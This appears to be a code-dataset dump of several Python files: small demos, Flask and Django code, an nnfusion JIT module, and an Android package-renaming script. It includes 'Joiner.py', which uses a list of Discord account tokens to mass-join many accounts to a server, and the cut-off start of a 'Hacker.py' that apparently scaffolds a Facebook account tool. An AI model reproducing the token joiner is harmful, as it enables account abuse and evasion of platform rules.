blob_id
stringlengths 40
40
| directory_id
stringlengths 40
40
| path
stringlengths 2
616
| content_id
stringlengths 40
40
| detected_licenses
listlengths 0
69
| license_type
stringclasses 2
values | repo_name
stringlengths 5
118
| snapshot_id
stringlengths 40
40
| revision_id
stringlengths 40
40
| branch_name
stringlengths 4
63
| visit_date
timestamp[us] | revision_date
timestamp[us] | committer_date
timestamp[us] | github_id
int64 2.91k
686M
⌀ | star_events_count
int64 0
209k
| fork_events_count
int64 0
110k
| gha_license_id
stringclasses 23
values | gha_event_created_at
timestamp[us] | gha_created_at
timestamp[us] | gha_language
stringclasses 213
values | src_encoding
stringclasses 30
values | language
stringclasses 1
value | is_vendor
bool 2
classes | is_generated
bool 2
classes | length_bytes
int64 2
10.3M
| extension
stringclasses 246
values | content
stringlengths 2
10.3M
| authors
listlengths 1
1
| author_id
stringlengths 0
212
|
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
77f011c7b8d55cb52f37c07ad781342c330b4d63
|
a5777f2b4f9362f6f30b3e5b23c88d4e8505b808
|
/CacHamToanHoc/ham_random.py
|
907eef612f60722fe2ed5b481e75847bd56806d9
|
[] |
no_license
|
Ericmanh/cac_ham_python
|
e7f1caf5fd01e6e29da5ed8aa97a41d1b956d981
|
0f24c723e31a76e3c338a598a9e480e2199fc822
|
refs/heads/master
| 2023-07-16T14:45:23.755223
| 2021-09-01T19:20:45
| 2021-09-01T19:20:45
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 323
|
py
|
# Demo of random number generation.
# randrange(x, y) returns a random integer n with x <= n < y.
from random import randrange

# Draw random numbers in [-100, 100) until 50 comes up, printing each draw
# (including the final 50) followed by a comma, then report the draw count.
attempts = 0
drawn = randrange(-100, 100)
attempts += 1
print(drawn, end=",")
while drawn != 50:
    drawn = randrange(-100, 100)
    attempts += 1
    print(drawn, end=",")
print("\n ơ lần ngẫu nhiên thư", attempts)
print("Bye!")
|
[
"caomanhkha@gmail.com"
] |
caomanhkha@gmail.com
|
c7e37831167ed1331aa25154516b4b52bf9c29cc
|
6ed4367001aeb16b24353a2ae5965fcd813ac23f
|
/course_wor_env/Scripts/pip3.7-script.py
|
ad3a0afaef4b6c8f53bb7071a6ee32d61aa719dc
|
[] |
no_license
|
YevheniiM/MemorizeThem
|
0d8453fec31924a64311eb779db9f5ee1fdae8a4
|
f9e39c278f3b98559339f53e0399856b51e57099
|
refs/heads/master
| 2020-03-14T23:44:39.877121
| 2018-05-19T21:38:35
| 2018-05-19T21:38:35
| 131,851,863
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 466
|
py
|
#!C:\Users\moroz.y\Study\Programing\CS_UCU\CourseWork\tests\MemorizeThemCourseWork\course_wor_env\Scripts\python.exe
# EASY-INSTALL-ENTRY-SCRIPT: 'pip==9.0.1','console_scripts','pip3.7'
# Auto-generated setuptools console-script shim: locates the 'pip3.7' entry
# point in the pinned pip==9.0.1 distribution and invokes it.
__requires__ = 'pip==9.0.1'
import re
import sys
from pkg_resources import load_entry_point

if __name__ == '__main__':
    # Normalize argv[0]: strip a trailing "-script.py(w)" or ".exe" suffix so
    # pip reports its own command name correctly (Windows wrapper layout).
    sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
    # Exit with whatever status the pip entry point returns.
    sys.exit(
        load_entry_point('pip==9.0.1', 'console_scripts', 'pip3.7')()
    )
|
[
"xmolodtsov@gamil.com"
] |
xmolodtsov@gamil.com
|
5bfc033492962d2f96b50a0944a4b477d3763356
|
5fd95add9b135eac55df8c17185f0348ca1faba5
|
/proj/myproject/pybo/views/main_views.py
|
5976c8b6fb41a38c54aa1e7c1477f0cf95f26e87
|
[] |
no_license
|
42azimut/jump2Flask
|
1128c486a4274f2dc9ea86e14b87412c6f1cd052
|
8626b7e50ac7bc40b5424299763b5a6a305de5f4
|
refs/heads/main
| 2023-04-24T12:14:27.042398
| 2021-05-13T12:36:54
| 2021-05-13T12:36:54
| 326,012,760
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 264
|
py
|
from flask import Blueprint, url_for
from werkzeug.utils import redirect

# Blueprint for the app's top-level routes, mounted at the site root.
bp = Blueprint('main', __name__, url_prefix='/')


@bp.route('/hello')
def hello_pybo():
    """Demo endpoint returning a static greeting."""
    return 'Hello, Pybo'


@bp.route('/')
def index():
    """Redirect the site root to the question list view.

    NOTE(review): assumes a 'question' blueprint with a `_list` view is
    registered elsewhere in the app — confirm against the project.
    """
    return redirect(url_for('question._list'))
|
[
"azimutuniverse@gmail.com"
] |
azimutuniverse@gmail.com
|
fbf8ce4a8f1a8fa531b08275055edceb9aa982a6
|
bad44a92fb338260f9c077689d7fa5472526c3fe
|
/src/python/nnfusion/jit.py
|
6fd2745e160f063b2ff9cf6c47e345239698423f
|
[
"LicenseRef-scancode-generic-cla",
"MIT"
] |
permissive
|
microsoft/nnfusion
|
ebc4c06331b8e93dbf5e176e5ecd3382e322ff21
|
bd4f6feed217a43c9ee9be16f02fa8529953579a
|
refs/heads/main
| 2023-08-25T17:41:37.517769
| 2022-09-16T05:59:01
| 2022-09-16T05:59:01
| 252,069,995
| 872
| 157
|
MIT
| 2023-07-19T03:06:21
| 2020-04-01T04:15:38
|
C++
|
UTF-8
|
Python
| false
| false
| 6,923
|
py
|
import copy
import functools
from inspect import isfunction, ismethod, isclass
import torch
from .jit_utils import TorchModule, get_signature
from .runtime import NNFusionRT
from .config import Config
def is_method_of_instance(obj, cls):
    """Tell whether *obj* is a bound method whose receiver is a *cls* instance."""
    if not ismethod(obj):
        return False
    return isinstance(obj.__self__, cls)
def is_subclass_of_cls(obj, cls):
    """Tell whether *obj* is itself a class object deriving from *cls*."""
    if not isclass(obj):
        return False
    return issubclass(obj, cls)
def get_nrt_forward(obj, signature, config, outputs, *inputs,
                    is_method=False):
    """
    Return a wrapped forward function that uses nnf (NNFusionRT) as runtime.

    Parameters:
        obj: the torch.nn.Module to compile (internal invariant — callers
            must have wrapped plain functions/methods already).
        signature: identifying signature string for this build.
        config: nnfusion compilation config.
        outputs: reference output(s) from an eager run; a bare Tensor is
            normalized to a one-element list.
        *inputs: example inputs used for compilation.
        is_method: if True, the returned callable takes the instance as its
            first positional argument and dispatches via `run_method`.
    """
    if not isinstance(obj, torch.nn.Module):
        raise AssertionError(
            "Internal bug, please report to "
            "https://github.com/microsoft/nnfusion"
        )

    # Remember whether the caller returned a bare Tensor so the wrapper can
    # unwrap its single result again on each call.
    output_is_tensor = isinstance(outputs, torch.Tensor)
    if output_is_tensor:
        outputs = [outputs]

    nnf = NNFusionRT(obj, config, signature)
    nnf.compile(inputs, outputs)

    # TODO free outputs and only save desc?
    def forward(*inputs):
        # Fresh result buffers shaped like the reference outputs.
        results = [
            torch.empty_like(output)
            for output in outputs
        ]
        if is_method:
            # First positional argument is the instance itself.
            obj, *inputs = inputs
            nnf.run_method(obj, inputs, results)
        else:
            inputs = list(inputs)
            nnf.run(inputs, results)
        if output_is_tensor:
            return results[0]
        return results
    return forward
def nrt_forward(obj, *inputs, config=None, signature=None, is_method=False):
    """Trace *obj* on *inputs* and return an NNFusion-backed forward callable.

    Runs the original object once eagerly to obtain reference outputs, then
    delegates to `get_nrt_forward` to compile and wrap.

    NOTE(review): the `is_method` parameter is accepted but never read in
    this body — confirm whether any caller relies on it.
    """
    if signature is None:
        signature = get_signature(obj)

    if hasattr(obj, '_orig_forward'):
        # shallow copy is needed to avoid recursion:
        # call instance forward -> call nnf_forward -> call instance forward
        obj_ = copy.copy(obj)
        obj_.forward = obj._orig_forward
        obj = obj_

    # Eager reference run: the outputs provide shapes/dtypes for compilation.
    outputs = obj(*inputs)

    def jit_class_method_using_decorator():
        """
        Check if obj is a class method with @nnfusion.jit decorator.
        The cases of decorating class method with the @ symbol or applying it
        as function are different.
        """
        return isinstance(inputs[0], torch.nn.Module)

    if jit_class_method_using_decorator():
        self, *inputs = inputs

        # shallow copy is needed to avoid recursion when using jit as decorator:
        # export onnx -> call forward to trace -> call nnf jit func -> export onnx
        self_ = copy.copy(self)

        def forward(*args):
            if forward.first_call:
                # First call: run the original (undecorated) target once.
                forward.first_call = False
                return obj(self, *args)
            # handle the case that jit target function will call `forward`
            return self.forward(*args)
        forward.first_call = True
        self_.forward = forward

        return get_nrt_forward(self_, signature, config, outputs,
                               *inputs, is_method=True)

    if isfunction(obj) or is_method_of_instance(obj, torch.nn.Module):
        # Plain functions and bound methods are wrapped into a Module first.
        return get_nrt_forward(TorchModule(obj), signature, config, outputs,
                               *inputs)
    return get_nrt_forward(obj, signature, config, outputs, *inputs)
def parse_config(tune, tuning_steps, config):
    """Merge the `tune` and `tuning_steps` overrides into a Config.

    Parameters:
        tune (Optional[bool]): overrides config['antares_mode'] when set.
        tuning_steps (Optional[int]): overrides config['kernel_tuning_steps']
            and implies tune=True.
        config (Optional[dict | Config]): base config; None means defaults.

    Returns:
        Config: the normalized configuration.

    Raises:
        TypeError: when `config`, `tuning_steps` or `tune` has a wrong type.
        ValueError: when tune=False conflicts with tuning_steps being set.
    """
    if config is None:
        config = Config()
    elif type(config) is dict:
        config = Config(config)
    # NOTE(review): exact-type check (not isinstance), so Config subclasses
    # are rejected here — presumably deliberate; confirm before changing.
    if not type(config) is Config:
        raise TypeError(
            "Expected optional 'config' argument of type dict or "
            f"nnfusion.Config but found {config}"
        )

    if tuning_steps is not None:
        if not isinstance(tuning_steps, int):
            raise TypeError(
                "Expected optional 'tuning_steps' argument of type int "
                f"but found {tuning_steps}"
            )
        if tune is False:
            raise ValueError(
                f"Conflict is detected: tune={tune} and "
                f"tuning_steps={tuning_steps}"
            )
        # Supplying tuning_steps implies tuning.
        tune = True
        config['kernel_tuning_steps'] = tuning_steps

    if tune is not None:
        if not isinstance(tune, bool):
            raise TypeError(
                "Expected optional 'tune' argument of type bool "
                f"but found {tune}"
            )
        config['antares_mode'] = tune

    return config
def check_obj_type(obj):
    """Validate that *obj* is a jit-able target; raise TypeError otherwise.

    Accepted: plain functions, torch.nn.Module instances, torch.nn.Module
    subclasses, and bound methods of torch.nn.Module instances.
    """
    supported = (
        isfunction(obj)
        or isinstance(obj, torch.nn.Module)
        or is_subclass_of_cls(obj, torch.nn.Module)
        or is_method_of_instance(obj, torch.nn.Module)
    )
    if supported:
        return
    raise TypeError(
        "Expected function or torch.nn.Module instance/method/class "
        f"but found {obj}"
    )
def jit_class(obj, config):
    """
    Return jitted class using dynamic inheritance to override the forward
    function and keep its signature.
    """
    # Subclass the user's Module so only `forward` is overridden; the @jit
    # decorator below lazily traces the parent implementation on first call.
    class JITModule(obj):
        @jit(config=config,
             _signature='.'.join([get_signature(obj), 'forward']))
        def forward(self, *args, **kwargs):
            return super().forward(*args, **kwargs)
    return JITModule
def jit(obj=None, *, tune=None, tuning_steps=None, config=None, _signature=None):
    """
    Parameters:
        obj (function, `torch.nn.Module` instance/method/class):
            The target object to be traced. When `obj` is an instance or a
            class, it is equivalent to trace its `forward` function.
        tune (Optional[bool]):
            Whether to tune kernel. By default it follows `config`.
            If set, it overwrites `config`.
        tuning_steps (Optional[int]):
            Number of kernel tuning steps. By default it follows `config`.
            If set, it overwrites `config` and `tune`.
        config (Optional[dict, nnfusion.Config]):
            NNFusion compilation config.
            By default it will be set to `nnfusion.Config()`.
            Pass a `dict` to overwrite default config or directly pass an
            instance of `nnfusion.Config`.
            For example, `@nnfusion.jit(tune=True,
                                        config={'kernel_tuning_steps': 42})`
            For more flags information, please execute the command `nnfusion`
            in the terminal.
    """
    config = parse_config(tune, tuning_steps, config)

    def _jit(_obj):
        check_obj_type(_obj)

        # A Module subclass is jitted via dynamic inheritance (jit_class).
        if is_subclass_of_cls(_obj, torch.nn.Module):
            return jit_class(_obj, config)

        @functools.wraps(_obj)
        def wrapper(*args):  # TODO support kwargs?
            # Compile lazily on the first call, when example inputs exist.
            if wrapper.forward is None:
                wrapper.forward = nrt_forward(_obj, *args,
                                              config=config,
                                              signature=_signature)
            return wrapper.forward(*args)
        wrapper.forward = None

        if isinstance(_obj, torch.nn.Module):
            # For instances, patch .forward in place and stash the original
            # so nrt_forward can break the recursion when it re-traces.
            _obj._orig_forward = _obj.forward
            _obj.forward = wrapper
            return _obj
        return wrapper

    # Support both bare `@jit` and parameterized `@jit(...)` usage.
    if obj is None:
        return _jit
    return _jit(obj)
|
[
"noreply@github.com"
] |
microsoft.noreply@github.com
|
2877f86b77d5145c624166a1fb173aaf3493ada6
|
763fd4660fff93a6fc10adf1b60e79af3937d394
|
/apps/login/migrations/0001_initial.py
|
f54705eaaec1b74370a3f7749d522ab44785ef1f
|
[] |
no_license
|
business-phil/user_dashboard
|
4c888fe03ac4658bf2abf38897d95f405b24d906
|
9164f9475efdc8f3891c4e3b0e9e54c459c94efd
|
refs/heads/master
| 2021-06-01T09:17:59.098779
| 2016-08-26T15:34:34
| 2016-08-26T15:34:34
| 66,364,971
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,104
|
py
|
# -*- coding: utf-8 -*-
# Generated by Django 1.10 on 2016-08-23 19:38
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
    """Initial migration for the login app: creates the User table."""

    # First migration of this app — no prior state.
    initial = True

    dependencies = [
    ]

    operations = [
        migrations.CreateModel(
            name='User',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('email', models.EmailField(max_length=254, unique=True)),
                ('first_name', models.CharField(max_length=45)),
                ('last_name', models.CharField(max_length=45)),
                # NOTE(review): 255 chars suggests a hashed password is
                # stored here rather than plaintext — confirm in the app code.
                ('password', models.CharField(max_length=255)),
                ('user_level', models.CharField(choices=[('user', 'User'), ('admin', 'Admin')], default='user', max_length=5)),
                ('description', models.TextField(default='', max_length=400)),
                ('created_at', models.DateTimeField(auto_now_add=True)),
                ('updated_at', models.DateTimeField(auto_now=True)),
            ],
        ),
    ]
|
[
"pfb3cn@virginia.edu"
] |
pfb3cn@virginia.edu
|
41cba4d61f7204ca6fb11832e4055fbadb800353
|
631ebc5d7126e7e9d5318de0d059893864e81532
|
/cbv/views.py
|
d9586b3bf3381231d0d138f78b76a8d4ae2b2ea1
|
[] |
no_license
|
AhmedAhmedFekry/cbv_posts
|
78935b444f1e62b5111d6a0b4b919999d8949d1e
|
b8dbc8d78d23758d5a8b7ad55a4fed9f51486183
|
refs/heads/main
| 2023-04-22T23:32:45.847158
| 2021-05-09T13:04:18
| 2021-05-09T13:04:18
| 365,743,901
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 348
|
py
|
from django.shortcuts import render
from django.views.generic.base import TemplateView
from core.models import Post
class Ex2(TemplateView):
    """TemplateView rendering cbv/temp1.html with every Post in context."""

    template_name='cbv/temp1.html'

    def get_context_data(self, **kwargs):
        # Extend the default context with the full Post queryset under "posts".
        context = super().get_context_data(**kwargs)
        context["posts"] =Post.objects.all()
        return context
|
[
"ahmedahmedfekry11305654@gmail.com"
] |
ahmedahmedfekry11305654@gmail.com
|
1f97d1627188febbb4baa4eec25c4bcb8547e3c1
|
90590ccc0fbc0172f1aaeb46eec1734d5d2f78b9
|
/Joiner.py
|
9553cd3a5889c0a67ce47ac039b8f1e7ff5febaf
|
[] |
no_license
|
KeparYTbcc/Discord-Joiner-pro
|
f03e3ee1cac7211a2f97da27dd5dc7bc80e7f003
|
8f070ed13624f3396461a82f17eb001f580966bb
|
refs/heads/main
| 2023-09-04T05:42:01.860227
| 2021-10-21T04:22:27
| 2021-10-21T04:22:27
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,628
|
py
|
import requests
from discord_webhook import DiscordWebhook
import os
import webbrowser
import sys
from time import sleep
os.system('color a')
os.system('title Mass Joiner Bot - KeparDEV ')
os.system('cls && mode 800')
words = ("""
/$$$$$ /$$
|__ $$ |__/
| $$ /$$$$$$ /$$ /$$$$$$$ /$$$$$$ /$$$$$$
| $$ /$$__ $$| $$| $$__ $$ /$$__ $$ /$$__ $$
/$$ | $$| $$ \ $$| $$| $$ \ $$| $$$$$$$$| $$ \__/
| $$ | $$| $$ | $$| $$| $$ | $$| $$_____/| $$
| $$$$$$/| $$$$$$/| $$| $$ | $$| $$$$$$$| $$
\______/ \______/ |__/|__/ |__/ \_______/|__/
/$$$$$$$
| $$__ $$
| $$ \ $$ /$$$$$$ /$$$$$$
| $$$$$$$//$$__ $$ /$$__ $$
| $$____/| $$ \__/| $$ \ $$
| $$ | $$ | $$ | $$
| $$ | $$ | $$$$$$/
|__/ |__/ \______/
Made By Kepar#0001 :)
I was bored
Tokens Extracted From 'tokens.txt'
""")
for char in words:
sleep(0.00000001)
sys.stdout.write(char)
sys.stdout.flush()
link = input('Discord Invite Link: ')
if len(link) > 6:
link = link[19:]
apilink = "https://discordapp.com/api/v6/invite/" + str(link)
print (link)
with open('tokens.txt','r') as handle:
tokens = handle.readlines()
for x in tokens:
token = x.rstrip()
headers={
'Authorization': token
}
requests.post(apilink, headers=headers)
print ("All valid tokens have joined!")
os.system('pause >nul')
|
[
"noreply@github.com"
] |
KeparYTbcc.noreply@github.com
|
d9d104fdad2d1d85198c5470e559124203bdd273
|
2c0df7f7feb0ad8412b71c25e36c5ed49534b384
|
/chaning-package-name.py
|
e4c5ba911307e9dea619b6f8822d101fe3a1900d
|
[] |
no_license
|
wwk5c5gh3/android-modify-packname
|
b8fc9d6b16fbbee117ed22fa0034518e85cfad36
|
758eadd39db5956bd4e7b32c7e4a0aad2b7d68df
|
refs/heads/master
| 2021-06-04T18:44:01.085733
| 2016-06-13T03:01:04
| 2016-06-13T03:01:04
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 7,673
|
py
|
# coding:utf-8
# "The world is so noisy, the truth so scarce" (original author's note)
# 2016.05.26
# Source project path
src = "../AdSharePlugin2"
# Destination project path
dst = "../AdSharePlugin3"
# Old package name
oldPackage = "me.fengchuan.adshareplugin"
# New package name
newPackage = "com.crazyspread.adshareplugin"
# Main module name
pro_name = "app"
# sdk.dir in local.properties still needs to be edited manually
# Files or directories to exclude from the copy/rewrite
exclude_dir = [".svn/", ".idea/", "build/", "captures/", "22.iml", "crazyspread.iml"]
# =================the parameters above may be modified=================
import os
import string
import random
import time
import ntpath
import subprocess
import re
# Generates a signing keystore, e.g. v22copy/crazyspread/crazyspread.keystore
def id_generator(size=6, chars=string.ascii_uppercase + string.digits):
    """Return a random identifier of *size* characters drawn from *chars*.

    These identifiers become keystore passwords and aliases, so use the
    OS-entropy-backed random.SystemRandom instead of the default Mersenne
    Twister, whose output is predictable (security fix; same interface).
    """
    rng = random.SystemRandom()
    return "".join(rng.choice(chars) for _ in range(size))
def path_leaf(path):
    """Return the final component of *path*, tolerating a trailing separator.

    Uses ntpath so both "/" and "\\" separators are handled.
    """
    head, tail = ntpath.split(path)
    if tail:
        return tail
    # Trailing separator: the tail is empty, so take the last piece of head.
    return ntpath.basename(head)
# --- Generate a fresh keystore with random credentials and record them. ---
timestr = time.strftime("%Y-%m-%d_%H%M%S")
storeFilePath = os.path.join(dst + os.sep + pro_name + os.sep, timestr + ".keystore")
# Keystore file name (leaf of the path)
storeFileName = path_leaf(storeFilePath)
storeFileDir = os.path.dirname(storeFilePath)
if not os.path.exists(storeFileDir):
    os.makedirs(storeFileDir)
# -dname "CN=first/last name,OU=org unit,O=organization,L=city,ST=state/province,C=two-letter country code"
# Alias
alias = id_generator()
# Store password
storepass = id_generator()
# Key password
keypass = id_generator()
# First and last name
CN = id_generator()
# Organizational unit
OU = id_generator()
# Organization
O = id_generator()
# City or locality
L = id_generator()
# State or province
ST = id_generator()
# Two-letter country code
C = id_generator(2, string.ascii_uppercase)
# Generate the keystore via keytool.
# NOTE(review): credentials are interpolated into a shell command line and
# are therefore visible in the process list while keytool runs.
os.system("keytool -genkey -v -keyalg RSA -keysize 2048 -validity 10000 -keystore " + storeFilePath \
          + " -alias " + alias + " -storepass " + storepass + " -keypass " + keypass\
          + " -dname '" + "CN=" + CN + ",OU=" + OU + "," + "O=" + O + "," \
          + "L=" + L + "," + "ST=" + ST + "," + "C=" + C +"'")
# Read back the keystore's MD5 fingerprint (used as the WeChat app signature).
output = subprocess.check_output("keytool -list -keystore " + storeFilePath + " -v -storepass " \
                                 + storepass + " | grep -E 'MD5'", shell=True)
storeFileMD5 = output.strip().split(" ")[1].replace(" ","").replace(":","")
storeReadMePath = os.path.join(dst + os.sep + pro_name + os.sep, storeFileName + ".readme")
storeReadMeDir = os.path.dirname(storeReadMePath)
if not os.path.exists(storeReadMeDir):
    os.makedirs(storeReadMeDir)
# Write a readme next to the keystore recording all generated credentials.
with open(storeReadMePath, "w") as readmeFile:
    readmeFile.write("签名库:" + storeFilePath + "\n")
    readmeFile.write("alias(别名):" + alias + "\n")
    readmeFile.write("storepass(保存口令):" + storepass + "\n")
    readmeFile.write("keypass(key口令):" + keypass + "\n")
    readmeFile.write("CN(名字与姓氏):" + CN + "\n")
    readmeFile.write("OU(组织单位名称):" + OU + "\n")
    readmeFile.write("O(组织名称):" + O + "\n")
    readmeFile.write("L(城市或区域名称):" + L + "\n")
    readmeFile.write("ST(州或省份名称):" + ST + "\n")
    readmeFile.write("C(单位的两字母国家代码):" + C + "\n")
    readmeFile.write("MD5(微信应用签名):" + storeFileMD5 + "\n")
# NOTE(review): `.closed` is an attribute access, not a close() call — a
# no-op here; the with-block above already closed the file.
readmeFile.closed
# --- Rewrite the old package name across the whole project tree. ---
for path, subdirs, files in os.walk(src):
    for name in files:
        oldPath = os.path.join(path, name)
        # Branch 1: the three build/config files that also embed signing info.
        # NOTE(review): these comparisons mix "/" into os.path.join results,
        # so they presumably only match on POSIX-style paths — confirm.
        if oldPath == os.path.join(src, pro_name + "/build.gradle") \
                or oldPath == os.path.join(src, pro_name + "/src/main/AndroidManifest.xml") \
                or oldPath == os.path.join(src, pro_name + "/proguard-rules.txt"):
            new_pro_gradle_path = oldPath.replace(src, dst)
            # NOTE(review): `dir` shadows the builtin of the same name.
            dir = os.path.dirname(new_pro_gradle_path)
            if not os.path.exists(dir):
                os.makedirs(dir)
            with open(oldPath) as infile, open(new_pro_gradle_path, "w") as outfile:
                for line in infile:
                    # Replace the old package name (3 config files and layout xml)
                    line = line.replace(oldPackage, newPackage)
                    # Replace the keystore file name
                    oldStoreFileName = re.findall(r"storeFile\sfile\(\"(.*?)\"\)", line)
                    if oldStoreFileName:
                        line = line.replace("".join(oldStoreFileName), storeFileName)
                    # Replace the keystore store password
                    oldStorepass = re.findall(r"storePassword\s\"(.*?)\"", line)
                    if oldStorepass:
                        line = line.replace("".join(oldStorepass), storepass)
                    # Replace the keystore alias
                    oldAlias = re.findall(r"keyAlias\s\"(.*?)\"", line)
                    if oldAlias:
                        line = line.replace("".join(oldAlias), alias)
                    # Replace the keystore key password
                    oldKeypass = re.findall(r"keyPassword\s\"(.*?)\"", line)
                    if oldKeypass:
                        line = line.replace("".join(oldKeypass), keypass)
                    outfile.write(line)
                print("generate file:" + outfile.name)
            # NOTE(review): `.closed` is a no-op attribute access; the
            # with-block already closed both files.
            infile.closed
            outfile.closed
        elif name.endswith(".java"):
            # Branch 2: Java sources — rewrite package name in path and text.
            new_pro_java_path = oldPath.replace(oldPackage.replace(".", os.sep), newPackage.replace(".", os.sep)) \
                .replace(src,dst)
            dir = os.path.dirname(new_pro_java_path)
            if not os.path.exists(dir):
                os.makedirs(dir)
            with open(oldPath) as infile, open(new_pro_java_path, "w") as outfile:
                for line in infile:
                    line = line.replace(oldPackage, newPackage)
                    outfile.write(line)
                print("generate file:" + outfile.name)
            infile.closed
            outfile.closed
        elif all(i not in oldPath for i in exclude_dir):
            # Branch 3: every other non-excluded file — same rewrites as
            # branch 1 (NOTE(review): duplicated logic, candidate for a helper).
            new_pro_gradle_path = oldPath.replace(src, dst)
            dir = os.path.dirname(new_pro_gradle_path)
            if not os.path.exists(dir):
                os.makedirs(dir)
            with open(oldPath) as infile, open(new_pro_gradle_path, "w") as outfile:
                for line in infile:
                    # Replace the old package name (3 config files and layout xml)
                    line = line.replace(oldPackage, newPackage)
                    # Replace the keystore file name
                    oldStoreFileName = re.findall(r"storeFile\sfile\(\"(.*?)\"\)", line)
                    if oldStoreFileName:
                        line = line.replace("".join(oldStoreFileName), storeFileName)
                    # Replace the keystore store password
                    oldStorepass = re.findall(r"storePassword\s\"(.*?)\"", line)
                    if oldStorepass:
                        line = line.replace("".join(oldStorepass), storepass)
                    # Replace the keystore alias
                    oldAlias = re.findall(r"keyAlias\s\"(.*?)\"", line)
                    if oldAlias:
                        line = line.replace("".join(oldAlias), alias)
                    # Replace the keystore key password
                    oldKeypass = re.findall(r"keyPassword\s\"(.*?)\"", line)
                    if oldKeypass:
                        line = line.replace("".join(oldKeypass), keypass)
                    outfile.write(line)
                print("generate file:" + outfile.name)
            infile.closed
            outfile.closed
# --- Run the Gradle release build in the new project. ---
os.chdir(dst)
os.system("chmod 755 ./gradlew")
os.system("./gradlew assembleRelease")
print("install apk dir:" + os.getcwd() + os.sep + pro_name + "/build/outputs/apk")
|
[
"zylstc2009@gmail.com"
] |
zylstc2009@gmail.com
|
5f1b3bc2f31499c6f0a9fe27c78a3cd3745ad250
|
830d6959e7167d2abdbdc2c9c0729eb511237382
|
/game1.py
|
587e946a0666013f6d0d8917f6ba10bbccff9267
|
[] |
no_license
|
camcottle/Game-Public
|
031422c0f5b5b6e8ec5cd4fe0816d49d07d69853
|
0aed140055aefab9637a2325226dbc2d3b153258
|
refs/heads/master
| 2022-12-02T04:53:54.294023
| 2020-08-11T23:13:12
| 2020-08-11T23:13:12
| 286,901,953
| 0
| 0
| null | 2020-08-12T02:59:34
| 2020-08-12T02:59:33
| null |
UTF-8
|
Python
| false
| false
| 2,609
|
py
|
# Title banner shown once at startup.
# Fix: "Chose" was a misspelling of "Choose" in the user-facing message.
print("Welcome to Choose your own adventure python edition")
print("")
def playerNames():
    """Prompt for the number of players (max 4) and greet each one by name.

    NOTE(review): a non-numeric answer raises ValueError; a count of 0 or
    below falls through silently with no message — confirm intended.
    NOTE(review): the 4-player greeting separates all names with commas,
    while 2/3 players use "&" before the last name — inconsistent output.
    """
    playerNum = int(input("How many players are playing? "))
    print(playerNum)
    # Great place to consider using a for loop
    if playerNum == 1:
        player1 = input("What is player one's first name? ")
        print("Welcome ", player1, "!")
    elif playerNum == 2:
        player1 = input("What is player one's first name? ")
        player2 = input("What is player two's first name? ")
        print("Welcome ", player1, "&", player2, "!")
    elif playerNum == 3:
        player1 = input("What is player one's first name? ")
        player2 = input("What is player two's first name? ")
        player3 = input("What is player three's first name? ")
        print("Welcome ", player1, ",", player2, "&", player3, "!")
    elif playerNum == 4:
        player1 = input("What is player one's first name? ")
        player2 = input("What is player two's first name? ")
        player3 = input("What is player three's first name? ")
        player4 = input("What is player four's first name? ")
        print("Welcome ", player1, ",", player2, ",", player3, ",", player4, "!")
    elif playerNum >= 5:
        print ("I am sorry unfortunately only four players are permitted.")
def characters():
    """Interactively collect character entries (name, dice count, role).

    NOTE(review): the three lists are re-created on every recursive call,
    so entries from earlier rounds are discarded — likely a bug; consider
    accumulating across calls or looping instead of recursing.
    """
    # Original design note — attributes each char will have: Name, Dice(1-2),
    # acceptable dice values (each die has a separate value), role type
    # (Builder, Recruiter, Both), current state (available, active, tired,
    # injured), and controlling player (or purchase cost if unowned).
    continueCreation = input("do you have a char to create? ").lower()
    charNames = []
    charDice = []
    charRole = []
    if continueCreation == "yes":
        getCharNames = input("Enter Next Char name ")
        getCharDice = input("Please enter the number of dice this char will use. ")
        getCharRole = input("Please enter the villagers role. ")
        charNames.append(getCharNames)
        charDice.append(getCharDice)
        charRole.append(getCharRole)
        print (charNames)
        print (charRole)
        print (charDice)
        continueCreationNext = input("Do you have another char to enter? ").lower()
        if continueCreationNext == "yes":
            characters()
        else:
            print("Thanks for entering these chars" )
    else:
        print("Thanks for entering these chars" )
    # diceNumber = int(input("How many dice does this character have? "))
# Script entry point: greet the players, then run character creation.
playerNames()
characters()
|
[
"noreply@github.com"
] |
camcottle.noreply@github.com
|
874b9161189f66fb76d33ead2d57b360fe368c25
|
59dee7060541dbfe93136055d96a9069c765e2fd
|
/Hacker.py
|
0d3d0658bb86a388e676af7008eac3843c3c60dc
|
[] |
no_license
|
Raheemboss0071/Usmankhan3
|
75d995575a47e16738d23cbc9c1f4ee17c9b0a36
|
809132912f4dc85eacfe2e1f94a4416f00e32d9e
|
refs/heads/master
| 2022-11-14T02:58:21.455819
| 2020-07-01T19:28:06
| 2020-07-01T19:28:06
| 276,464,503
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 35,385
|
py
|
#!/usr/bin/python2
#coding=utf-8
import os,sys,time,datetime,random,hashlib,re,threading,json,urllib,cookielib,requests,mechanize
from multiprocessing.pool import ThreadPool
from requests.exceptions import ConnectionError
from mechanize import Browser
reload(sys)
sys.setdefaultencoding('utf8')
br = mechanize.Browser()
br.set_handle_robots(False)
br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(),max_time=1)
br.addheaders = [('User-Agent', 'Opera/9.80 (Android; Opera Mini/32.0.2254/85. U; id) Presto/2.12.423 Version/12.16')]
def keluar():
print "\033[1;96m[!] \x1b[1;91mExit"
os.sys.exit()
def acak(b):
w = 'ahtdzjc'
d = ''
for i in x:
d += '!'+w[random.randint(0,len(w)-1)]+i
return cetak(d)
def cetak(b):
w = 'ahtdzjc'
for i in w:
j = w.index(i)
x= x.replace('!%s'%i,'\033[%s;1m'%str(31+j))
x += '\033[0m'
x = x.replace('!0','\033[0m')
